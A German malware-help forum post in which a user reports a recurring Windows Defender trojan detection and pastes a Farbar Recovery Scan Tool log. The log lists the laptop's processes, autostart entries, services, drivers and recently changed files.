Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Thema geschlossen
Alt 09.01.2021, 15:21   #1
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



FRST Log:

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-01-2021
durchgeführt von ***** (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 15:07:39)
Gestartet von C:\Users\*****\Downloads
Geladene Profile: *****
Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Edge
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe
(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe
(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(Google Inc -> Google) C:\Users\*****\AppData\Local\Google\Chrome\User Data\SwReporter\36.184.200\software_reporter_tool.exe <3>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <8>
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\*****\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe
(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Uninstall 18.212.1021.0008\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\18.212.1021.0008\amd64"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Uninstall 18.212.1021.0008] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\18.212.1021.0008"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ControlCenter.lnk [2018-12-19]
ShortcutTarget: ControlCenter.lnk -> C:\Program Files (x86)\T-Home\Eumex 800 V1.30\ControlCenter.exe (T-Com) [Datei ist nicht signiert]
Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1
Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250
Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1

Edge: 
======
DownloadDir: C:\Users\*****\Downloads
Edge Profile: C:\Users\*****\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-09]
Edge StartupUrls: Default -> "hxxp://google.de/"

FireFox:
========
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR Profile: C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]
CHR Extension: (Präsentationen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-12-17]
CHR Extension: (Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-12-19]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-09]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-12-19]
CHR Extension: (Tabellen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-12-17]
CHR Extension: (Google Docs Offline) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-01-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-09]
CHR Extension: (Google Mail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-09]
CHR Extension: (Chrome Media Router) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-01-09]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )
R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)
U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]
S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 15:07 - 2021-01-09 15:08 - 000019490 _____ C:\Users\*****\Downloads\FRST.txt
2021-01-09 15:05 - 2021-01-09 15:08 - 000000000 ____D C:\FRST
2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\Desktop\Verkn
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\AppData\Roaming\Apple Computer
2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\AppData\Local\Intel
2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html
2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg
2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575
2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner
2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf
2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf
2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf
2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule
2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi
2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf
2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf
2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 15:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001
2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\*****\OneDrive
2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\*****\AppData\Local\Adobe
2021-01-09 15:03 - 2018-12-17 09:52 - 000000000 ____D C:\Users\*****\AppData\Local\Packages
2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-09 15:02 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\*****\IntelGraphicsProfiles
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\*****\3D Objects
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\*****\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 15:00 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles
2021-01-07 19:45 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-07 19:13 - 2018-12-18 08:26 - 000002328 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk
2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-07 17:24 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-01-07 17:17 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-01-07 16:34 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages
2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp
2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx
2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner
2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002
